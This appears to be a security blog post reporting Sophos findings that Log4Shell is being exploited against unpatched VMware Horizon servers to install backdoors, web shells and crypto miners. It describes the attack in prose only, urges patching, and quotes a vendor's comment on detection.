Log4Shell Exploited To Infect VMware Horizon Instances

Last year, I wrote about Log4Shell being actively exploited by threat actors to deliver malware and crypto miners. And that trend appears to be continuing as Sophos researchers warned today that Log4Shell is being exploited to infect VMware Horizon servers with backdoors and crypto miners. According to the report, the Log4Shell attacks target unpatched VMware Horizon with three different backdoors and four cryptocurrency miners.

In late December 2021 and in January 2022, there were multiple reports of active exploitation of the Log4Shell vulnerability in VMware Horizon servers. The attack used the Lightweight Directory Access Protocol resource call of Log4J to retrieve a malicious Java class file that modified existing legitimate Java code, adding a web shell that provided remote access and code execution to the attackers.  SophosLabs has observed these attacks in customer telemetry since the beginning of January.

The attempts to leverage Horizon, which continued and grew in number throughout January, were frequently associated with attempts to deploy cryptocurrency mining malware; others had less clear motives, and may be associated with initial access brokers or ransomware actors. These attacks continue.

So in short, you need to patch all the things to protect yourself… But:

Attempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature. VMware has pushed out patched versions of Horizon as of March 8 2022, but many organizations may still not have deployed the fixed versions or applied workarounds to vulnerable ones. Even if they have, as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways.

That’s not good. I have a comment on this from Saryu Nayyar, CEO and Founder of Gurucul:

“Similar to Cobalt Strike, this is an example of an assessment tool being weaponized by threat actors to breach organizations. It is critical to employ self-training machine learning and behavioral models to identify exploitation of the exposed vulnerability as well as detect the remote surveillance done by the attackers. Current XDR and traditional SIEM solutions, even with claims of User Entity Behavior Analytics rooted in known patterns and rule-based artificial intelligence, are unable to adapt to these methods. Organizations need to invest in solutions that employ transparent non rule-based machine learning models to more rapidly identify new attacks.”

So not only should you patch everything that runs VMware Horizon, but you should also go over your infrastructure with a fine tooth comb because the bad guys may already be in the door.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: